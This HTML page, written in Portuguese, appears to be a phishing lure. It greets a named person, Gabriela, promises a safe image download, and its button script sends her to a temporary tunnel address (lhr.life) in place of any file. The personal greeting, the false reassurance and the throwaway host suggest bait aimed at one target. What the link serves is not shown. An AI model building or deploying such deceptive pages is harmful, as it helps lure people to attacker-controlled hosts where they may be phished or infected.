<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            height: 100vh;
            background-color: #f4f4f4;
        }

        #logo {
            max-width: 100%;
            height: auto;
            margin-bottom: 20px;
        }

        .container {
            text-align: center;
            background-color: #fff; /* Fundo suave */
            padding: 20px;
            border-radius: 12px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        h1, p {
            color: #000; /* Texto preto para boa legibilidade */
        }

        button {
            background-color: #e74c3c; /* Vermelho da logo */
            color: #fff;
            padding: 10px 20px;
            border: none;
            border-radius: 12px;
            cursor: pointer;
            font-size: 16px;
        }

        button:hover {
            background-color: #c0392b; /* Tonalidade mais escura no hover */
        }
    </style>
    <title>Download de Imagens</title>
</head>
<body>

    <img id="logo" src="t.png" alt="Logo">

    <div class="container">
        <h1>Download de Imagens</h1>
        <p>Olá Gabriela, clique no botão abaixo para baixar as imagens com segurança.</p>
        <button onclick="downloadImages()">Download</button>
    </div>

    <script>
        function downloadImages() {
            // Lógica de download das imagens aqui
            // Por exemplo, window.location.href = 'caminho/do/arquivo.zip';

            // Redirecionamento para o link
            window.location.href = 'https://4c2d4f5e39cb2b.lhr.life';
        }
    </script>
</body>
</html>
